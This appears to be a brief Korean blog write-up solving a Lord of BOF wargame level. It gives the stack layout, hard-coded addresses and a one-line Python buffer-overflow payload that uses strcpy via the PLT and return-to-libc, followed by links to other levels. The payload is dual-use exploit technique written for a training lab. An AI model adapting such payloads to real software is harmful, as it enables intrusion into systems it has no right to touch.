succubus - PLT
Stack : *addr[4] + buffer[40] + sfp[4] + ret[4]
strcpy(PLT) : 0x8048410
buffer : 0xbffffa90
strcpy_dest : 0xbffffac0
strcpy_source : 0xbffffa90
Payload : ./nightmare `python -c 'print "\xe0\x8a\x05\x40" + "\xe0\x91\x03\x40" + "\xf9\xbf\x0f\x40" + "A"*32 + "\x10\x84\x04\x08" + "AAAA" + "\xc0\xfa\xff\xbf" + "\x90\xfa\xff\xbf"'`
Using strcpy + RTL
'Wargames > Load Of BOF' 카테고리의 다른 글
LOB Redhat 6.2 - xavius (0) | 2015.11.02 |
---|---|
LOB Redhat 6.2 - nightmare (0) | 2015.11.02 |
LOB Redhat 6.2 - zombie_assassin (0) | 2015.10.30 |
LOB Redhat 6.2 - assassin (0) | 2015.10.30 |
LOB Redhat 6.2 - giant (0) | 2015.10.30 |